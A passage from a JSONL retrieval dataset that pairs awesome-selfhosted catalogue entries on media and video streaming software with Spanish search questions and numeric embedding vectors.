UPnP AV MediaServer that allows you to easily share audio, video, and pictures. Media player software may use Rygel to become a MediaRenderer that may be controlled remotely by a UPnP or DLNA Controller [LGPL-2.1, C]. Stash β€” A web-based library organizer and player for your adult media stash, with auto-tagging and metadata scraping support [AGPL-3.0, Docker/Go]. Β΅Streamer β€” Lightweight and very quick server to stream MJPEG video from any V4L2 device to the net [GPL-3.0, C/deb]. ΓΌWave β€” Self-hosted collaborative listening platform. Users take turns playing mediaβ€”songs, talks, gameplay videos, or anything elseβ€”from a variety of media sources like YouTube and SoundCloud [⚠, MIT, Nodejs].", "indexar": "ΒΏCon quΓ© puedo compartir mis fotos y videos fΓ‘cilmente con otros dispositivos?", "v": [-0.08629, 0.27883, -0.07707, -0.05297, -0.03885, -0.07756, -0.05999, 0.0096, -0.04472, -0.19025, -0.08366, -0.07579, -0.10299, 0.00808, 0.08196, -0.06118, 0.15017, -0.00416, 0.04007, -0.10908, -0.0177, -0.01753, -0.13506, -0.06616, 0.0514, 0.01582, 0.07554, 0.06368, -0.15514, -0.02942, 0.04248, -0.02752, 0.02906, 0.05947, -0.14239, -0.04909, 0.07205, 0.1208, -0.00706, -0.0107, -0.06038, -0.02672, -0.02225, -0.00071, 0.04115, -0.05754, -0.10266, -0.04261, -0.11296, 0.00775, -0.01669, 0.02817, -0.09659, 0.05753, -0.13216, -0.10857, 0.1413, -0.0909, 0.09121, 0.02581, -0.00863, 0.00965, -0.07651, 0.01315, 0.03641, 0.01091, -0.09111, 0.05702, -0.08748, 0.03971, 0.02896, 0.02079, 0.05935, -0.00137, 0.03735, 0.09273, -0.12348, -0.02093, -0.02169, 0.05723, -0.01253, -0.00493, -0.00713, -0.03279, 0.00654, -0.00157, -0.00085, 0.01673, -0.01142, -0.11082, 0.0329, -0.00863, 0.05806, -0.10676, -0.04529, 0.00511, 0.0037, 0.10647, 0.03728, 0.03579, 0.01784, -0.00696, -0.02721, 0.03105, -0.12861, -0.00464, 0.06509, -0.0859, -0.062, -0.12944, 0.02934, -0.04385, -0.09693, -0.00779, -0.07359, 0.03252, -0.08297, -0.055, -0.00114, 0.00598, 0.01226, -0.02968, 0.04874, -0.06122, 0.13002, 0.0384, -0.0959, 0.10106, -0.05184, 0.0607, 0.01953, -0.04178, 0.05142, -0.04253, 0.03674, -0.00554, 0.07737, -0.07559, -0.03401, -0.09107, 0.04785, -0.06266, 0.01448, -0.12547, -0.01815, 0.03091, 0.03211, -0.07091, -0.0605, 0.04863, -0.01019, 0.02626, -0.0138, -0.04178, -0.02767, 0.07129, 0.01815, -0.08335, -0.08599, -0.01254, -0.10694, 0.04283, 0.01034, 0.00752, -0.09201, -0.05104, -0.06283, -0.03511, 0.00885, -0.0107, -0.03469, 0.05982, -0.00935, -0.04318, 0.04989, -0.00262, 0.00961, -0.05723, 0.00851, -0.03852, -0.06739, 0.07652, 0.00187, 0.07661, 0.08203, -0.00516, -0.00078, 0.06686, -0.02501, 0.03045, 0.02533, 0.01085, 0.04082, 0.01096, 0.0759, -0.06665, -0.08062, -0.02841, 0.01533, 0.06543, -0.03266, -0.05364, 0.03715, 0.04038, 0.03859, -0.04423, -0.04085, 0.06479, 0.03303, -0.02048, -0.0316, 0.03214, 0.10055, -0.0399, -0.06945, 0.03679, 0.03566, 0.06756, -0.05425, -0.03211, 0.06383, 0.07409, 0.02673, 0.02469, 0.06067, 0.11619, -0.027, 0.00578, -0.02074, -0.04387, 0.00138, 0.03062, -0.03631, -0.05853, 0.0671, 0.03084, -0.03336, -0.0225, -0.04354, -0.00271, 0.00722, 0.01574, 0.02465, -0.02172, -0.10625, 0.00971, -0.06852, 0.02657, -0.02066, -0.11951, 0.02436, 0.03704, 0.0637, -0.01584, -0.05794, 0.0032]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Multimedia Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Multimedia Streaming", "tema": "media streaming - multimedia streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Multimedia Streaming: NymphCast β€” Turn your choice of Linux-capable hardware into an audio and video source for a television or powered speakers (alternative to Chromecast) [BSD-3-Clause, C++]. Rygel β€” UPnP AV MediaServer that allows you to easily share audio, video, and pictures. Media player software may use Rygel to become a MediaRenderer that may be controlled remotely by a UPnP or DLNA Controller [LGPL-2.1, C]. Stash β€” A web-based library organizer and player for your adult media stash, with auto-tagging and metadata scraping support [AGPL-3.0, Docker/Go]. Β΅Streamer β€” Lightweight and very quick server to stream MJPEG video from any V4L2 device to the net [GPL-3.0, C/deb]. ΓΌWave β€” Self-hosted collaborative listening platform. Users take turns playing mediaβ€”songs, talks, gameplay videos, or anything elseβ€”from a variety of media sources like YouTube and SoundCloud [⚠, MIT, Nodejs].", "indexar": "ΒΏExiste alguna alternativa libre a Chromecast para enviar multimedia desde mi PC?", "v": [-0.10631, 0.11754, -0.02478, -0.09024, -0.15862, -0.18846, 0.0138, 0.07156, -0.11289, -0.20259, -0.00202, -0.06022, -0.04685, -0.06464, 0.09651, -0.06884, 0.12723, 0.10226, 0.12575, -0.04998, -0.0398, -0.11184, -0.19127, -0.09119, -0.05606, 0.02998, -0.07655, -0.04118, -0.04769, -0.0659, 0.0155, -0.03379, 0.05982, 0.02429, 0.01752, -0.07378, 0.18039, -0.0609, 0.09597, 0.03734, 0.09462, -0.03398, 0.03196, 0.0467, 0.00827, -0.08636, 0.01397, -0.04742, 0.0196, 0.00755, -0.10149, -0.03114, -0.16846, -0.01176, -0.05089, 0.02448, 0.05706, -0.14577, -0.0411, -0.09416, 0.09469, 0.13716, -0.03171, -0.0211, -0.03643, 0.13276, -0.04396, 0.04075, -0.18084, 0.13687, -0.03676, -0.14018, -0.00378, 0.06649, -0.03051, 0.02101, -0.14385, -0.04295, 0.12575, 0.04331, 0.09474, -0.01365, 0.00612, 0.0037, -0.03702, -0.01937, 0.06566, -0.09417, 0.03416, 0.06342, 0.13277, -0.00675, 0.00206, 0.10113, 0.03683, -0.1999, 0.00127, 0.00534, 0.02321, -0.00465, 0.04313, 0.02716, -0.03209, 0.00157, -0.05057, -0.02656, -0.04346, -0.06357, -0.07125, 0.10188, -0.04887, 0.03385, -0.05337, 0.01851, -0.06601, -0.02591, 0.01218, -0.05669, -0.01225, -0.02841, -0.0621, 0.01007, -0.02992, 0.04525, 0.03031, -0.00456, 0.04318, 0.01196, -0.06887, 0.02068, 0.09239, -0.12893, -0.0083, -0.08257, -0.04359, 0.00846, 0.06966, -0.04848, 0.01378, 0.05413, 0.00679, 0.03296, 0.01991, 0.0649, -0.02948, -0.03634, -0.02459, 0.01466, -0.00701, -0.08724, -0.02045, -0.0015, -0.03834, 0.02168, -0.00132, 0.03048, -0.04426, 0.00535, 0.0085, -0.02624, -0.07399, -0.02172, 0.02307, 0.02069, -0.01039, -0.01003, -0.02347, 0.05379, -0.0528, 0.0339, -0.02632, 0.07415, 0.09433, -0.09173, 0.02008, -0.02286, 0.03824, 0.02732, -0.00565, 0.05809, 0.00768, 0.03477, -0.04536, -0.02783, 0.01653, -0.04996, -0.02033, -0.02579, -0.06592, -0.01383, -0.05994, -0.01766, -0.05191, -0.05991, 0.04311, -0.00335, -0.01974, -0.06691, -0.03622, 0.04454, -0.08187, 0.01271, 0.0208, -0.03399, -0.03196, 0.03367, -0.01207, 0.01472, 0.03094, 0.03548, 0.02472, 0.04734, 0.03383, 0.01175, 0.0452, 0.03892, 0.07587, 0.01909, -0.0246, 0.02291, 0.01777, -0.04487, -0.04795, -0.03919, 0.00381, 0.01264, 0.02149, 0.01857, -0.04094, -2e-05, 0.03338, -0.00231, 0.01225, 0.02216, -0.00615, -0.00674, -0.00104, 0.01111, 0.04014, 0.02837, 0.03145, 0.01165, -0.03048, 0.00292, -0.03865, -0.00257, -0.05875, 0.04715, -0.02871, -0.02613, -0.00913, -0.01473, -0.06317, -0.04175, -0.04039, 0.08768]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Video Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Video Streaming", "tema": "media streaming - video streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Video Streaming: CyTube β€” Synchronize media, chat, and more for an arbitrary number of channels [MIT, Nodejs]. Invidious β€” Alternative YouTube front-end [⚠, AGPL-3.0, Docker/Crystal]. MediaCMS β€” Modern, fully featured open source video and media CMS, written in Python/Django/React, featuring a REST API [AGPL-3.0, Python/Docker]. OvenMediaEngine β€” Streaming Server with Sub-Second Latency [AGPL-3.0, C++/Docker]. Owncast β€” Decentralized single-user live video streaming and chat server for running your own live streams similar in style to the large mainstream options [MIT, Go]. PeerTube β€” Decentralized video streaming platform using P2P (BitTorrent) directly in the web browser [AGPL-3.0, Nodejs]. Rapidbay β€” Videostreaming service/torrent client that allows searching and playing videos from torrents in the browser or from a Chromecast/AppleTV/Smart TV [MIT, Python/Docker]. Restreamer β€” Access H.264 real-time video streaming on your website without a streaming provider [Apache-2.0, Nodejs/Docker].", "indexar": "que programa de cΓ³digo abierto sirve para transmitir videos en vivo con chat?", "v": [-0.06822, -0.03335, -0.14653, -0.16049, -0.07309, -0.268, -0.00228, 0.01295, 0.03159, -0.16318, -0.01308, -0.28384, -0.0307, -0.07029, 0.04781, 0.01735, 0.16246, -0.06545, 0.1346, -0.00243, 0.0156, 0.05386, -0.01582, -0.14469, -0.03796, 0.0925, 0.00757, 0.02014, -0.00818, 0.03043, 0.02333, -0.0158, 0.03694, 0.04515, 0.02382, -0.01296, 0.09477, 0.07921, -0.07152, 0.11968, -0.00606, 0.00488, 0.02327, 0.05144, 0.07713, -0.07845, 0.06032, -0.0265, 0.00229, 0.0202, -0.04706, -0.00217, -0.01146, -0.01443, -0.04845, -0.03907, -0.07673, -0.1719, -0.01435, 0.00063, 0.06894, -0.07477, 0.07132, -0.1233, -0.01556, -0.02305, 0.05346, 0.07241, -0.12436, 0.09149, -0.05168, 0.03682, -0.0055, 0.10511, -0.04638, 0.03812, -0.15356, -0.03793, -0.01757, 0.05145, -0.01245, -0.00824, 0.02556, 0.04948, 0.0016, 0.02944, 0.01415, 0.03495, 0.0169, -0.1147, 0.06247, 0.07742, 0.09292, 0.06658, 0.09163, -0.01873, 0.02845, 0.02853, 0.07599, -0.01221, 0.06292, -0.06547, -0.10409, 0.01658, 0.04259, 0.06646, 0.10631, -0.127, -0.084, 0.0686, 0.01905, -0.05357, -0.08049, -0.03086, -0.03918, -0.01032, -0.03831, 0.02311, 0.04392, 0.02903, -0.13107, 0.08513, -0.04268, 0.06754, 0.04071, 0.04695, -0.0097, 0.04926, -0.05499, 0.11702, -0.0501, -0.00352, -0.0216, -0.01635, 0.02122, -0.03887, 0.10195, 0.0788, 0.00728, 0.00016, -0.02331, 0.06119, 0.02231, 0.0247, -0.00307, 0.03828, -0.03868, -0.11427, -0.05641, 0.01602, 0.00903, 0.06294, -0.0671, -0.01957, -0.04461, -0.03284, 0.00946, -0.03146, -0.08534, 0.02105, -0.0303, 0.01025, -0.07295, -0.08849, 0.01822, 0.00868, -0.02235, 0.06563, 0.03351, 0.04989, 0.03104, 0.02349, 0.14682, -0.08637, -0.0716, 0.03298, 0.00833, -0.03114, -0.03692, -0.09868, -0.04371, 0.04096, 0.06918, 0.0101, -0.02195, -0.01014, -0.03122, 0.07086, -0.04287, -0.02117, 0.01214, 0.01303, -0.02208, 0.02609, 0.02161, 0.01918, 0.00796, -0.03194, -0.0383, -0.03915, -0.02469, 0.04757, 0.02151, 0.00108, 0.02441, 0.07912, -0.02269, 0.00909, 0.03826, 0.12224, -0.02497, -0.02744, 0.05015, 0.05773, -0.01188, 0.03483, 0.04103, 0.06205, 0.07497, 0.03494, 0.00857, -0.0577, -0.03413, -0.02009, 0.03388, -0.03675, -0.00475, 0.01516, 0.04336, -0.03515, -0.04498, -0.05493, 0.03649, 0.02603, 0.0342, -0.01282, -0.02092, 0.04511, -0.03444, -0.09982, -0.07027, 0.05845, -0.03102, -0.01687, 0.02472, 0.02356, -0.05824, -0.01675, 0.00293, -0.03118, -0.02535, -0.00968, -0.01639, -0.02204, -0.01262, 0.03309]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Video Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Video Streaming", "tema": "media streaming - video streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Video Streaming: CyTube β€” Synchronize media, chat, and more for an arbitrary number of channels [MIT, Nodejs]. Invidious β€” Alternative YouTube front-end [⚠, AGPL-3.0, Docker/Crystal]. MediaCMS β€” Modern, fully featured open source video and media CMS, written in Python/Django/React, featuring a REST API [AGPL-3.0, Python/Docker]. OvenMediaEngine β€” Streaming Server with Sub-Second Latency [AGPL-3.0, C++/Docker]. Owncast β€” Decentralized single-user live video streaming and chat server for running your own live streams similar in style to the large mainstream options [MIT, Go]. PeerTube β€” Decentralized video streaming platform using P2P (BitTorrent) directly in the web browser [AGPL-3.0, Nodejs]. Rapidbay β€” Videostreaming service/torrent client that allows searching and playing videos from torrents in the browser or from a Chromecast/AppleTV/Smart TV [MIT, Python/Docker]. Restreamer β€” Access H.264 real-time video streaming on your website without a streaming provider [Apache-2.0, Nodejs/Docker].", "indexar": "cual es una alternativa libre a YouTube que no necesite cuenta?", "v": [-0.06454, 0.06481, -0.16565, 0.06692, -0.03353, -0.01271, -0.05853, -0.04979, -0.07693, -0.19366, -0.06465, -0.19604, 0.02121, 0.06054, -0.04821, -0.13805, 0.05831, -0.0667, 0.19232, -0.0786, 0.0325, -0.06866, -0.04685, -0.05461, -0.08461, -0.09361, -0.02858, 0.01892, -0.04456, -0.0223, -0.01461, 0.05703, -0.06081, 0.02183, -0.01451, 0.06482, 0.14314, 0.06588, -0.01563, -0.0553, 0.01957, -0.04515, -0.12655, 0.16509, -0.04409, 0.01576, -0.03124, 0.04098, -0.0654, 0.06603, 0.0331, 0.0342, -0.12741, 0.03906, 0.02975, 0.02849, 0.12799, -0.10242, -0.08671, -0.04514, -0.05813, -0.09685, 0.1111, 0.00532, 0.00468, 0.05783, -0.00914, 0.11061, -0.04473, 0.07656, -0.05216, -0.02894, -0.05536, -0.01192, 0.02584, 0.14349, -0.02348, -0.01512, -0.11938, 1e-05, 0.07448, -0.11489, -0.00258, 0.01408, -0.03182, -0.1405, 0.09747, -0.07406, 0.02513, -0.09712, -0.00471, 0.06997, 0.0034, 0.08286, -0.02914, -0.04618, 0.02559, 0.05063, -0.01749, -0.06414, 0.03408, 0.02025, -0.08747, 0.03567, 0.02638, 0.08169, 0.02286, -0.09999, -0.04894, 0.01388, 0.05864, 0.04887, -0.02325, -0.05281, -0.01677, 0.02194, -0.10166, -0.01076, 0.03785, 0.00033, 0.06732, -0.01782, -0.08112, -0.11231, 0.03019, 0.07216, 0.00351, 0.03711, 0.00566, 0.03459, 0.06665, -0.05605, -0.02788, -0.06809, -0.01128, 0.00384, 0.0515, -0.05087, -0.06206, -0.02158, 0.03028, -0.01718, 0.01011, -0.10819, 0.09401, -0.0815, 0.02118, -0.08553, -0.08535, 0.03418, -0.07353, 0.01198, -0.05751, 0.06703, -0.03527, 0.05078, -0.06076, -0.07255, -0.07639, 0.05606, 0.06587, -0.09319, 0.00895, -0.0267, -0.03813, 0.03431, -0.02725, 0.02255, -0.09245, -0.0025, -0.01025, 0.10827, 0.00819, -0.04929, 0.00505, -0.09948, 0.01798, -0.04231, 0.08884, 0.01361, -0.07415, 0.03956, -0.08114, -0.00702, -0.03883, -0.11992, -0.03825, -0.00259, -0.00529, 0.09336, -0.06765, -0.00141, -0.08051, -0.00147, -0.0163, 0.00765, -0.04448, -0.09503, 0.02846, -0.01327, -0.05787, -0.04429, -0.02708, -0.02575, -0.08879, -0.01839, -0.04026, 0.01577, -0.01945, -0.01431, 0.03871, -0.05999, 0.00449, -0.01288, -0.00063, -0.04053, 0.0888, -0.01783, 0.02245, 0.02557, 0.07542, 0.03112, 0.01063, -0.02983, -0.00209, 0.06299, 0.0408, 0.01749, -0.05479, 0.01703, -0.04857, -0.0146, -0.05682, -0.04008, 0.04967, 0.01993, 0.04064, 0.01965, -0.00225, 0.02837, 0.04117, 0.08782, -0.03386, -0.01296, -0.01368, -0.02751, -0.09707, 0.0183, 0.03099, -0.11429, -0.01208, 0.08104, 0.03334, 0.03458, 0.05434, 0.00258]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Video Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Video Streaming", "tema": "media streaming - video streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Video Streaming: CyTube β€” Synchronize media, chat, and more for an arbitrary number of channels [MIT, Nodejs]. Invidious β€” Alternative YouTube front-end [⚠, AGPL-3.0, Docker/Crystal]. MediaCMS β€” Modern, fully featured open source video and media CMS, written in Python/Django/React, featuring a REST API [AGPL-3.0, Python/Docker]. OvenMediaEngine β€” Streaming Server with Sub-Second Latency [AGPL-3.0, C++/Docker]. Owncast β€” Decentralized single-user live video streaming and chat server for running your own live streams similar in style to the large mainstream options [MIT, Go]. PeerTube β€” Decentralized video streaming platform using P2P (BitTorrent) directly in the web browser [AGPL-3.0, Nodejs]. Rapidbay β€” Videostreaming service/torrent client that allows searching and playing videos from torrents in the browser or from a Chromecast/AppleTV/Smart TV [MIT, Python/Docker]. Restreamer β€” Access H.264 real-time video streaming on your website without a streaming provider [Apache-2.0, Nodejs/Docker].", "indexar": "con quΓ© puedo montar un servidor de streaming descentralizado usando p2p?", "v": [-0.01489, 0.09461, -0.21337, -0.14495, -0.1368, -0.08541, 0.00176, -0.10877, -0.02001, -0.07555, -0.08402, -0.00981, 0.0049, -0.06662, -0.04875, 0.05333, 0.08007, -0.04886, 0.08064, 0.00784, 0.01759, -0.03557, 0.03043, -0.11157, -0.03549, 0.04375, 0.01532, -0.10647, -0.12298, -0.06012, 0.00587, -0.04829, 0.0114, 0.08001, -0.02457, -0.11966, 0.02486, 0.17484, -0.05109, 0.00281, 0.01657, -0.03339, -0.07104, 0.01661, 0.01328, 0.04359, 0.01678, -0.1629, -0.00125, -0.02337, -0.05989, -0.02539, -0.20337, 0.00089, -0.03994, 0.01409, 0.06376, -0.15243, 0.14729, -0.07604, -0.09341, 0.07187, -0.05133, -0.0385, -0.00342, -0.03525, -0.10288, 0.0277, -0.1436, -0.00793, -0.04064, 0.00956, 0.0283, -0.01537, 0.09297, 0.08823, -0.02846, -0.04627, 0.14023, 0.03299, 0.04531, 0.01564, -0.00838, 0.11405, -0.07079, -0.03853, -0.00792, -0.01837, 0.07134, 0.01007, 0.0546, 0.06288, -0.04192, 0.04103, 0.00396, -0.07411, 0.10543, -0.0575, 0.01275, 0.01438, 0.04048, 0.09024, -0.0543, 0.12855, 0.0399, -0.0128, 0.14305, -0.10711, 0.02729, -0.06332, 0.04896, 0.0838, -0.08853, 0.02692, -0.03376, -0.09669, -0.03651, 0.03253, 0.03464, 0.07551, -0.06204, 0.03412, 0.05379, 0.02584, 0.01872, -0.03284, 0.12763, 0.02656, -0.00848, 0.0198, -0.02977, -0.01891, -0.10205, -0.0854, -0.01502, -0.04891, 0.07545, -0.07238, -0.06465, -0.00376, 0.01874, -0.02956, -0.07406, -0.00014, 0.11338, -0.02186, 0.12338, -0.11576, -0.07808, 0.03395, 0.01151, 0.02018, -0.05997, -0.05725, -0.10586, -0.02838, -0.04622, -0.11874, -0.04216, 0.08352, 0.04149, 0.04134, 0.01097, 0.04787, -0.02518, 0.02069, -0.02176, 0.03206, 0.0575, -0.00333, -0.03033, 0.06287, -0.00421, -0.0729, 0.07256, -0.01945, -0.05902, -0.04571, 0.04269, 0.02862, -0.04055, 0.01997, -0.0307, 0.0406, -0.06187, -0.00737, -0.0448, -0.01273, 0.04775, 0.06321, -0.00658, 0.00178, -0.05301, 0.06697, 0.078, -0.08544, -0.0494, -0.02596, -0.01833, -0.0555, -0.04987, -0.04683, -0.0263, -0.0237, -0.02528, -0.05465, -0.06423, 0.02603, -0.00186, 0.04198, -0.02961, -0.01015, 0.11522, -0.08555, -0.02515, 0.01766, 0.04709, -0.02642, -0.01882, 0.00273, -0.04138, 0.01681, 0.04011, 0.01099, 0.02888, 0.02967, 0.02661, 0.01501, 0.05897, 0.03533, -0.10466, 0.0288, -0.00929, -0.02445, 0.00479, -0.0152, 0.03286, -0.00038, -0.00361, -0.06293, 0.006, 0.09212, -0.0374, -0.02622, 0.00017, -0.06946, -0.06726, 0.02361, -0.05099, -0.03551, -0.03438, -0.06129, 0.01103, -0.01976, -0.01222, -0.02656]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Video Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Video Streaming", "tema": "media streaming - video streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Video Streaming: SRS β€” A simple, high efficiency and real-time video server, supports RTMP, WebRTC, HLS, HTTP-FLV and SRT [MIT, Docker/C++]. SyncTube β€” Lightweight and very simple to setup CyTube alternative to watch videos with friends and chat [MIT, Nodejs/Haxe]. Tiramisu β€” BitTorrent engine with a FUSE virtual filesystem that streams torrents live to Plex/Jellyfin without downloading (alternative to Real-Debrid) [GPL-2.0, Go/Docker]. Tube Archivist β€” Organize, search, and enjoy your YouTube collection. Subscribe, download, and track viewed content with metadata indexing and a user-friendly interface [⚠, GPL-3.0, Docker]. Tube β€” Youtube-like (_without censorship and features you don't need!_) video sharing app written in Go which also supports automatic transcoding to MP4 H.265 AAC, multiple collections and RSS feed [MIT, Go]. VideoLAN Client (VLC) β€” Cross-platform multimedia player client and server supporting most multimedia files as well as DVDs, Audio CDs, VCDs, and various streaming protocols [GPL-2.0, C/deb].", "indexar": "que programa sirve para transmitir video en tiempo real y soporta varios protocolos de streaming?", "v": [0.09675, 0.10871, -0.21434, -0.13845, 0.03831, -0.17153, 0.11034, -0.15103, 0.10488, -0.0877, 0.0093, -0.05927, 0.13549, -0.12611, -0.00158, 0.0578, 0.10474, -0.03981, 0.09003, 0.04562, 0.049, 0.00894, -0.03759, -0.11728, 0.05581, 0.02742, 0.08485, 0.02701, -0.04711, -0.03978, -0.00135, -0.01221, 0.05015, -0.03557, 0.00581, -0.06846, -0.01017, 0.13878, -0.10658, 0.07329, 0.04521, -0.0228, 4e-05, -0.04638, 0.0545, -0.03092, -0.00245, -0.04024, -0.02939, -0.03949, -0.05267, 0.08211, -0.03523, 0.05516, -0.08169, -0.10173, -0.01774, -0.23721, -0.00353, -0.00827, 0.01641, -0.07418, 0.03618, -0.09991, 0.00223, 0.01975, -0.0104, 0.04982, -0.15838, -0.05426, -0.09162, -0.02541, 0.06231, 0.02785, -0.04994, 0.04145, -0.12703, -0.0298, 0.02162, -0.06635, 0.01702, -0.02562, 0.05179, 0.10083, -0.09882, 0.00059, 0.02943, -0.01646, 0.03687, -0.11634, -0.00348, 0.10862, 0.07292, -0.02649, 0.11161, -0.04377, 0.08438, -0.02879, 0.04137, -0.00161, 0.05533, -0.00212, -0.11321, 0.05598, -0.00486, 0.09101, 0.0784, -0.12506, -0.03529, -0.01915, -0.00247, 0.02316, -0.06907, -0.0334, 0.00243, -0.01455, -0.01476, -0.03796, 0.01864, 0.03799, -0.0831, 0.0491, -0.01858, -0.01127, 0.07846, -0.00403, -0.04131, 0.00921, -0.04165, 0.08143, -0.05273, 0.02405, -0.08957, -0.06411, -0.01944, -0.12732, 0.02409, 0.03086, -0.0141, -0.10576, 0.05323, 0.0738, -0.05824, 0.00334, 0.01066, -0.05714, 0.02183, -0.10109, -0.11197, 0.0148, 0.00698, 0.05818, -0.05134, -0.01862, -0.04831, -0.05567, -0.00633, -0.03491, -0.12321, 0.07826, 0.07232, 0.02934, -0.01038, -0.10078, 0.02689, 0.00431, -0.05652, 0.08271, 0.07406, 0.04163, -0.0208, 0.09029, 0.01846, -0.08009, -0.11486, 0.0083, -0.01152, -0.09135, 0.03752, -0.06417, -0.07595, 0.05229, 0.04658, 0.08682, -0.00942, -0.05269, -0.04978, 0.03742, -0.01906, 0.01986, 0.03311, -0.00613, -0.05716, 0.09837, -0.00662, -0.02942, -0.08134, -0.0331, 0.02086, -0.02205, -0.04123, -0.04589, 0.02468, -8e-05, -0.00585, 0.05567, -0.03125, 0.01775, 0.00296, 0.11316, -0.00181, -0.023, 0.0348, -0.03648, -0.06791, -0.02664, 0.06572, -0.0002, 0.00764, 0.02007, 0.00843, -0.0379, -0.00822, -0.0237, -0.01769, -0.01626, 0.05312, 0.04002, -0.00076, -0.04334, -0.03051, 0.02107, -0.02919, -0.01885, 0.03282, -0.00972, -0.0042, -0.02148, -0.04522, -0.07571, -0.01135, 0.06452, -0.04992, -0.01224, -0.00922, -0.02434, -0.10662, 0.02057, 0.03871, -0.0588, -0.04634, 0.03424, 0.02654, 0.0289, 0.02993, -0.02402]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Video Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Video Streaming", "tema": "media streaming - video streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Video Streaming: SRS β€” A simple, high efficiency and real-time video server, supports RTMP, WebRTC, HLS, HTTP-FLV and SRT [MIT, Docker/C++]. SyncTube β€” Lightweight and very simple to setup CyTube alternative to watch videos with friends and chat [MIT, Nodejs/Haxe]. Tiramisu β€” BitTorrent engine with a FUSE virtual filesystem that streams torrents live to Plex/Jellyfin without downloading (alternative to Real-Debrid) [GPL-2.0, Go/Docker]. Tube Archivist β€” Organize, search, and enjoy your YouTube collection. Subscribe, download, and track viewed content with metadata indexing and a user-friendly interface [⚠, GPL-3.0, Docker]. Tube β€” Youtube-like (_without censorship and features you don't need!_) video sharing app written in Go which also supports automatic transcoding to MP4 H.265 AAC, multiple collections and RSS feed [MIT, Go]. VideoLAN Client (VLC) β€” Cross-platform multimedia player client and server supporting most multimedia files as well as DVDs, Audio CDs, VCDs, and various streaming protocols [GPL-2.0, C/deb].", "indexar": "cual es una alternativa libre para compartir videos con amigos y charlar mientras lo ven?", "v": [-0.09873, 0.17094, -0.12967, 0.03746, -0.19759, -0.07182, -0.01411, -0.10213, 0.03221, -0.19327, -3e-05, -0.16992, -0.03586, 0.03658, 0.13297, 0.02814, 0.1027, 0.02794, 0.15969, -0.00128, -0.08484, 0.05446, -0.09901, -0.05494, -0.08527, -0.0916, -0.01996, 0.02438, -0.00255, 0.05261, 0.02014, -0.05503, 0.06182, 0.01557, 0.03431, 0.04218, 0.15155, 0.10375, 0.02477, -0.02177, -0.08222, 0.05012, -0.06126, -0.00528, 0.14356, -0.07712, -0.17969, 0.03557, -0.04993, 0.11191, -0.10845, 0.05944, -0.04901, 0.01782, -0.01111, 0.015, 0.09927, -0.15643, 0.01214, -0.00998, -0.03749, -0.03787, -0.01727, -0.02121, 0.05736, 0.04657, -0.06584, 0.02639, -0.12585, 0.14719, 0.02375, -0.02739, -0.01535, 0.02883, -0.09999, 0.05264, -0.10128, 0.04336, -0.04703, 0.09443, 0.02243, -0.14178, 0.03361, 0.08647, -0.00049, -0.01272, 0.1105, -0.06259, 0.01549, 0.04889, 0.03958, 0.06652, 0.00985, 0.07678, -0.03214, -0.09653, 0.02564, 0.11435, -0.02733, 0.0267, 0.10167, 0.03714, -0.10458, -0.02089, 0.00032, -0.01912, -0.04066, -0.05222, -0.05379, 0.08399, 0.08923, 0.09798, -0.00392, 0.0028, 0.0285, -0.06688, -0.0401, 0.06457, 0.0202, -0.00051, -0.01922, -0.04411, -0.11823, -0.02226, 0.01922, 0.07053, -0.03777, 0.08191, -0.04607, 0.09312, 0.02653, -0.0322, -0.01393, -0.11704, 0.0225, -0.02988, 0.12754, -0.01248, -0.06844, -0.06966, 0.0478, -0.00449, -0.01024, -0.09345, 0.01761, 0.00075, 0.06232, -0.06865, -0.00709, 0.01142, -0.01645, 0.00042, 0.02508, 0.04172, -0.05524, -0.02895, -0.03953, -0.00502, -0.02533, 0.06829, 0.02367, 0.02119, 0.05609, -0.06638, -0.06149, 0.00456, -0.04175, -0.01577, -0.05504, 0.00256, 0.00902, 0.03013, 0.0755, -0.03978, 0.03326, -0.08378, 0.00377, -0.10866, -0.00969, -0.07898, 0.02641, 0.00773, -0.10654, 0.02217, -0.05146, -0.05681, -0.00881, 0.05858, 0.01891, -0.00128, -0.01757, -0.03355, -0.03216, -0.03317, -0.01206, -0.07593, -0.011, -0.05332, 0.00973, 0.03344, -0.05074, -0.03366, 0.01012, -0.00289, 0.00692, -0.01681, -0.03358, 0.03727, 0.04168, 0.03281, 0.03094, -0.0115, 0.02927, -0.0354, -0.03193, -0.02233, 0.0236, 0.02885, -0.02327, 0.02188, 0.03863, 0.0316, 0.03041, -0.00708, -0.01594, 0.08773, 0.02568, 0.07265, -0.07189, 0.01877, -0.03921, 0.00585, 0.03908, -0.00095, 0.09085, 0.04115, 0.02839, 0.03498, 0.00361, -0.03888, 0.00137, 0.05503, 0.00564, -0.02157, -0.06075, -0.01377, -0.0973, 0.02567, -0.03016, -0.08881, -0.0097, 0.0248, 0.02742, -0.03409, -0.02337, 0.0163]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Video Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Video Streaming", "tema": "media streaming - 